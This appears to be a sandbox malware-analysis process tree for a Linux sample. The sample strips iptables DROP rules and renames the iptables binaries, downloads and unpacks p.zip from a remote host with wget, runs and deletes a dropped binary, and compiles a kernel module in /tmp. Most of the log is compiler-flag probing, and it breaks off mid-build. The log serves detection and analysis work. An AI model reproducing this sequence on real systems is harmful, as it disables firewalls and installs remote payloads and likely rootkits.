/usr/bin/awkawk "{print \$8}"2⤵PID:1606
-
-
/usr/bin/grepgrep 146.1902⤵PID:1605
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1613
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1612
-
-
/usr/bin/grepgrep 144.1262⤵PID:1611
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1617
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1616
-
-
/usr/bin/grepgrep 167.1722⤵PID:1615
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1621
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1620
-
-
/usr/bin/grepgrep 172.1042⤵PID:1619
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1625
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1624
-
-
/usr/bin/grepgrep 172.1052⤵PID:1623
-
-
/usr/bin/mvmv /sbin/iptables /sbin/tokens2⤵
- System Network Configuration Discovery
PID:1627
-
-
/usr/bin/headhead -c 82⤵PID:1631
-
-
/usr/bin/md5summd5sum2⤵PID:1630
-
-
/usr/bin/mvmv /usr/sbin/iptables /usr/sbin/tokens2⤵
- System Network Configuration Discovery
PID:1626
-
-
/usr/bin/catcat /tmp/.ICE-uniex2⤵PID:1632
-
-
/usr/bin/wgetwget "--timeout=5" "--tries=2" http://example.established.site/p.zip -q -O /tmp/p.zip2⤵
- System Network Configuration Discovery
PID:1633
-
-
/usr/bin/unzipunzip -qq -o p.zip2⤵
- System Network Configuration Discovery
PID:1634
-
-
/usr/bin/rmrm -rf p.zip2⤵
- System Network Configuration Discovery
PID:1635
-
-
/usr/bin/mvmv dsm_sa_ip /etc/sysconfig/yayaya/dsm_sa_ip2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1636
-
-
/usr/bin/cpcp /etc/sysconfig/yayaya/dsm_sa_ip /821c0ca42⤵
- System Network Configuration Discovery
PID:1637
-
-
/usr/bin/sleepsleep 22⤵PID:1639
-
-
/821c0ca4/821c0ca42⤵PID:1638
-
-
/usr/bin/pidofpidof 821c0ca42⤵
- Reads runtime system information
PID:1640
-
-
/usr/bin/rmrm -rf /821c0ca42⤵PID:1641
-
-
/usr/bin/mkdirmkdir /tmp/a2⤵PID:1642
-
-
/usr/bin/rmrm -rf "/tmp/a/*"2⤵PID:1643
-
-
/usr/bin/catcat2⤵PID:1644
-
-
/usr/bin/catcat2⤵PID:1645
-
-
/usr/bin/unameuname -r2⤵PID:1647
-
-
/usr/bin/catcat2⤵PID:1646
-
-
/usr/bin/unameuname -r2⤵PID:1648
-
-
/usr/bin/makemake -C /lib/modules/5.15.0-105-generic/build "M=/tmp/a" modules2⤵PID:1649
-
/bin/sh/bin/sh -c "uname -m | sed -e s/i.86/x86/ -e s/x86_64/x86/ -e s/sun4u/sparc64/ -e s/arm.*/arm/ -e s/sa110/arm/ -e s/s390x/s390/ -e s/ppc.*/powerpc/ -e s/mips.*/mips/ -e s/sh[234].*/sh/ -e s/aarch64.*/arm64/ -e s/riscv.*/riscv/"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1650 -
/usr/bin/sedsed -e s/i.86/x86/ -e s/x86_64/x86/ -e s/sun4u/sparc64/ -e "s/arm.*/arm/" -e s/sa110/arm/ -e s/s390x/s390/ -e "s/ppc.*/powerpc/" -e "s/mips.*/mips/" -e "s/sh[234].*/sh/" -e "s/aarch64.*/arm64/" -e "s/riscv.*/riscv/"4⤵
- System Network Configuration Discovery
PID:1652
-
-
/usr/bin/unameuname -m4⤵PID:1651
-
-
-
/bin/sh/bin/sh -c "getconf LFS_CFLAGS 2>/dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1653 -
/usr/bin/getconfgetconf LFS_CFLAGS4⤵PID:1654
-
-
-
/bin/sh/bin/sh -c "getconf LFS_LDFLAGS 2>/dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1655 -
/usr/bin/getconfgetconf LFS_LDFLAGS4⤵PID:1656
-
-
-
/bin/sh/bin/sh -c "getconf LFS_LIBS 2>/dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1657 -
/usr/bin/getconfgetconf LFS_LIBS4⤵PID:1658
-
-
-
/bin/sh/bin/sh -c "LC_ALL=C gcc --version 2>/dev/null | head -n 1"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1659 -
/usr/bin/headhead -n 14⤵PID:1661
-
-
/usr/bin/gccgcc --version4⤵PID:1660
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mindirect-branch=thunk-extern -mindirect-branch-register -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mindirect-branch=thunk-extern -mindirect-branch-register\"; else echo \"\"; fi"3⤵PID:1662
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16624⤵PID:1663
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mindirect-branch=thunk-extern" -mindirect-branch-register -c -x c /dev/null -o /tmp/a/.tmp_1662/tmp4⤵
- Writes file to tmp directory
PID:1664 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1662/ -dumpbase tmp "-mindirect-branch=thunk-extern" -mindirect-branch-register "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccIy1lqu.s5⤵PID:1665
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1662/tmp /tmp/ccIy1lqu.s5⤵PID:1666
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1662/tmp /tmp/ccIy1lqu.s5⤵PID:1666
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1662/tmp /tmp/ccIy1lqu.s5⤵PID:1666
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1662/tmp /tmp/ccIy1lqu.s5⤵PID:1666
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16624⤵PID:1667
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mindirect-branch-cs-prefix -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mindirect-branch-cs-prefix\"; else echo \"\"; fi"3⤵PID:1668
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16684⤵PID:1669
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mindirect-branch-cs-prefix -c -x c /dev/null -o /tmp/a/.tmp_1668/tmp4⤵PID:1670
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1668/ -dumpbase tmp -mindirect-branch-cs-prefix "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccP0jTxH.s5⤵PID:1671
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1668/tmp /tmp/ccP0jTxH.s5⤵PID:1672
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1668/tmp /tmp/ccP0jTxH.s5⤵PID:1672
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1668/tmp /tmp/ccP0jTxH.s5⤵PID:1672
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1668/tmp /tmp/ccP0jTxH.s5⤵
- Writes file to tmp directory
PID:1672
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16684⤵PID:1673
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mindirect-branch=thunk-inline -mindirect-branch-register -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mindirect-branch=thunk-inline -mindirect-branch-register\"; else echo \"\"; fi"3⤵PID:1674
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16744⤵PID:1675
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mindirect-branch=thunk-inline" -mindirect-branch-register -c -x c /dev/null -o /tmp/a/.tmp_1674/tmp4⤵PID:1676
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1674/ -dumpbase tmp "-mindirect-branch=thunk-inline" -mindirect-branch-register "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/cck8E4gA.s5⤵PID:1677
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1674/tmp /tmp/cck8E4gA.s5⤵PID:1678
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1674/tmp /tmp/cck8E4gA.s5⤵PID:1678
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1674/tmp /tmp/cck8E4gA.s5⤵PID:1678
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1674/tmp /tmp/cck8E4gA.s5⤵
- Writes file to tmp directory
PID:1678
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16744⤵PID:1679
-
-
-
/usr/bin/unameuname -m3⤵PID:1680
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mpreferred-stack-boundary=4 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -mpreferred-stack-boundary=4\"; else echo \"\"; fi"3⤵PID:1681
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16814⤵PID:1682
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mpreferred-stack-boundary=4" -c -x c /dev/null -o /tmp/a/.tmp_1681/tmp4⤵
- Writes file to tmp directory
PID:1683 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1681/ -dumpbase tmp "-mpreferred-stack-boundary=4" "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccrjw92u.s5⤵PID:1684
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1681/tmp /tmp/ccrjw92u.s5⤵PID:1685
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1681/tmp /tmp/ccrjw92u.s5⤵PID:1685
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1681/tmp /tmp/ccrjw92u.s5⤵PID:1685
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1681/tmp /tmp/ccrjw92u.s5⤵
- Writes file to tmp directory
PID:1685
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16814⤵PID:1686
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -fcf-protection=none -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fcf-protection=none\"; else echo \"\"; fi"3⤵PID:1687
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16874⤵PID:1688
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-fcf-protection=none" -c -x c /dev/null -o /tmp/a/.tmp_1687/tmp4⤵PID:1689
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1687/ -dumpbase tmp "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccjCtyHT.s5⤵
- Writes file to tmp directory
PID:1690
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1687/tmp /tmp/ccjCtyHT.s5⤵PID:1691
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1687/tmp /tmp/ccjCtyHT.s5⤵PID:1691
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1687/tmp /tmp/ccjCtyHT.s5⤵PID:1691
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1687/tmp /tmp/ccjCtyHT.s5⤵
- Writes file to tmp directory
PID:1691
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16874⤵PID:1692
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fcf-protection=none\"; else echo \"\"; fi"3⤵PID:1693
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16934⤵PID:1694
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -c -x c /dev/null -o /tmp/a/.tmp_1693/tmp4⤵
- Writes file to tmp directory
PID:1695 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1693/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccOoLqUz.s5⤵
- Writes file to tmp directory
PID:1696
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1693/tmp /tmp/ccOoLqUz.s5⤵PID:1697
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1693/tmp /tmp/ccOoLqUz.s5⤵PID:1697
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1693/tmp /tmp/ccOoLqUz.s5⤵PID:1697
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1693/tmp /tmp/ccOoLqUz.s5⤵
- Writes file to tmp directory
PID:1697
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16934⤵PID:1698
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-falign-jumps=1\"; else echo \"\"; fi"3⤵PID:1699
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16994⤵PID:1700
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" -c -x c /dev/null -o /tmp/a/.tmp_1699/tmp4⤵
- Writes file to tmp directory
PID:1701 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1699/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccw1Bq0m.s5⤵
- Writes file to tmp directory
PID:1702
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1699/tmp /tmp/ccw1Bq0m.s5⤵PID:1703
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1699/tmp /tmp/ccw1Bq0m.s5⤵PID:1703
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1699/tmp /tmp/ccw1Bq0m.s5⤵PID:1703
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1699/tmp /tmp/ccw1Bq0m.s5⤵
- Writes file to tmp directory
PID:1703
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16994⤵PID:1704
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-falign-loops=1\"; else echo \"\"; fi"3⤵PID:1705
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17054⤵PID:1706
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -c -x c /dev/null -o /tmp/a/.tmp_1705/tmp4⤵
- Writes file to tmp directory
PID:1707 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1705/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccxG0s2o.s5⤵
- Writes file to tmp directory
PID:1708
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1705/tmp /tmp/ccxG0s2o.s5⤵PID:1709
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1705/tmp /tmp/ccxG0s2o.s5⤵PID:1709
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1705/tmp /tmp/ccxG0s2o.s5⤵PID:1709
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1705/tmp /tmp/ccxG0s2o.s5⤵PID:1709
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17054⤵PID:1710
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mno-fp-ret-in-387\"; else echo \"\"; fi"3⤵PID:1711
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17114⤵PID:1712
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 -c -x c /dev/null -o /tmp/a/.tmp_1711/tmp4⤵PID:1713
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1711/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/cc4jlCST.s5⤵PID:1714
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1711/tmp /tmp/cc4jlCST.s5⤵PID:1715
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1711/tmp /tmp/cc4jlCST.s5⤵PID:1715
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1711/tmp /tmp/cc4jlCST.s5⤵PID:1715
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1711/tmp /tmp/cc4jlCST.s5⤵
- Writes file to tmp directory
PID:1715
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17114⤵PID:1716
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mskip-rax-setup\"; else echo \"\"; fi"3⤵PID:1717
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17174⤵PID:1718
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup -c -x c /dev/null -o /tmp/a/.tmp_1717/tmp4⤵
- Writes file to tmp directory
PID:1719 -
